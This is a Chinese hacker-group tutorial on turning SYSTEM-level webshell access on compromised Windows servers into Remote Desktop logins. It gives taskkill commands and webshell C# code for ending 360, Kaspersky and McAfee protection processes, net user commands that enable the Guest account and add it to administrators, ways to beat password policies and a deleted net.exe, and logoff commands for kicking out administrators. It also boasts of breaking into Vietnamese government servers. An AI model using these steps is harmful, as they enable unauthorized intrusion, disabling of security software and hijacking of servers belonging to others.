最近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法成功。SYSTEM的权限,权限是够了,却无法成功,原因是什么呢?
原因有很多种,于是我总结了一下成因,并在下面文章进行了一一分析,然后附上了一点个人的突破绕过方法。提权不可能百分百成功,我只是总结了一些常见的情况,其他的我会慢慢补充
作者:YoCo Smart
来自:Silic Group Hacker Army
http://blackbap.org
Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:
I.杀软篇
1,360杀毒软件
2,麦咖啡杀毒软件
3,卡巴斯基杀毒软件
4,其他杀毒软件或防护软件
II.策略篇
1,3389端口变更
2,莫名其妙无法添加账户
3,管理员限制篇
4,系统已达最大连接数处理
-----------------------I. 杀软篇-----------------------------
1,360杀毒软件
经常会在国内的一些服务器上遇到360杀毒和防护软件,如果使用webshell进行添加administrators账户时,360会阻止并提示管理员,导致添加失败。
那么如何突破360的限制?360不能完美的支持Server系统,也就是说,其实很简单。
阻止Webshell添加账户的主要是360主动防御,而结束了主动防御,360杀毒根本就是摆设。
那天手痒去百度搜了下blackbap.org这个关键字,居然出现在360论坛上,原来是Silic开发的php大马被某个服务器管理员举报到360论坛上去了。
大致就是这个网管把webshell传上去,说360查不出来,希望更新病毒库云云,结果360工程师看了以后说更新360就能杀到了,结果网管说更新了还是杀不到。然后工程师说装什么什么的,网管说装了,还是杀不到,然后工程师就缩头乌龟了。可见360在server上面很垃圾,用小白的话说就是,请把拿着打口水仗的钱多花在研发产品上吧。
好了,扯淡到此为止,突破方法也该千呼万唤始出来了。
先执行tasklist看一下进程列表,然后
taskkill /im 进程名.exe /f
把主动防御结束
360相关进程如下:
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe,这几个灭了,基本上360的阻碍就清除了,该加账户加账户,该pr就pr了。
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):
protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write("<script>alert('Killed');location.href='?'</" + "script>");
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}
asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。2,麦咖啡杀毒软件
以前就谈过了关于如何绕过麦咖啡杀毒软件获得3389登陆权限的文章。
文章原文在这里:http://bbs.blackbap.org/thread-2085-1-1.html
那么完整一下过程就是,启用Guest账户,修改Guest用户的密码,添加Guest为administrators用户组。
经过测试,麦咖啡的防护进程恐怕是突破的,于是cmd命令如下:
net user guest /active:yes //将guest用户启用
net user guest silic!&11133 //修改guest密码
net localgroup administrators guest /add //添加guest到管理员用户组中
这三条命令第二条或者第三条有时候可能不会显示命令执行成功,但是实际上只要是SYSTEM权限,就应该可以执行成功的,有无回显并不重要。
3,卡巴斯基
卡巴斯基的防护也是让人头疼的。关于突破卡巴斯基的方法,有很多。
调整系统时间,让卡巴的key失效,这就不说了。还有mkdir建立以非法字符“.”命名的文件夹,将pr等提权程序传进去。
SYSTEM突破卡巴的防御直接添加用户,恐怕不太容易,不过可以尝试,用taskkill结束进程的语句后面 & net user add命令,同时执行结束进程和添加账户。
此方法尚未实践,但是理论上是可以的,因为卡巴不像麦咖啡,它可以直接被结束,但是立即就会重启进程。
4,其他防护软件
见过很多非主流的防护软件,例如金山网盾KSafeSvc,护卫盾,还有某公司的放篡改程序,具体名字我忘了。
这些软件的突破方法和主流防护软件突破方法大致相同,结束进程,或者不使用添加账户,直接启用现有的Guest来突破监控,不赘述了
--------------------------------II,策略篇-----------------------------
1,3389端口变更
进行3389添加账户前首先要知道3389到底开启没有。
目前只遇到过3389端口变更的例子,没见过不开启3389的例子。那为什么有的外网3389连不上呢?
原因很简单,3389端口变更了呗。找出来的方法再简单不过了netstat -an查看所有开启的端口。
一个一个可疑的端口试未免太差劲了。netstat -ano查看端口和使用端口的进程pid,然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口
注意,是svchost.exe当中的某个。
2,莫名奇妙无法添加账户
什么是莫名奇妙?有些主机,Webshell是System权限,tasklist也看不到任何防护的进程,管理员也没在线,提权程序也添加不了,怎么搞?
有因必有果,这样的情况添加不了,多数是系统有组策略限制,通常限制的是密码最短长度。而这个组策略又多数是麦咖啡等防护软件设置上的。或者干脆就是装机的系统本身就GHO上了这个设置。
突破方法不用说了,把密码位数设置长一点就ok,原先密码是123456,现在改为1234abcd!@#$就过了
如果还是添加不上,可以尝试用vbs脚本来添加。
3,管理员限制
有些BT管理员很可恶,直接把c:\windows\system32的net.exe给删了或者换了,于是你直接net的时候会提示拒绝访问或者不是系统命令等等类似提示云云。
管理员看似很牛B,其实很傻逼,系统的net.exe没了,你自己传一个自己的net.exe就突破了。
当然,也有64位系统和你的程序不兼容的情况发生,他是64你就传64位的,很好搞。
4,达到最大连接限制
有时候添加了账户,但是连接提示最大连接数限制。管理员不在线,却占着线不让你上去,等管理员自己上线了,再把你删了。这种管理员够缺德的
对于这种上不去的,首先query user查看在线的账户,然后看他的登陆ID,一般是0,最高不超过8,超过8说明服务器好久没重启了(这个没准的)
然后logoff ID,就把对应ID的管理员踢掉了。然后就能登录了。
当然你在logoff的时候不要把自己logoff了,也不最好不要白天踢人。管理员在线被人踢掉的话,你懂的。— —!
2011年和越南黑阔搞攻防切磋的时候,咱们网站的人就在人越南的gov服务器上乱搞,然后。。。咱网站的黑阔挂菊花聊天室,管理员就删啊删的,咱网站的黑阔就logoff了管理员的账户,然后禁用和administrator。。。后来管理员就眼瞅着大家在菊花聊天室聊天,然后跑了半个小时去机房把网线拔了。。。logoff命令真的很阴毒,尤其是对一些服务器不在本地的网站来说。。。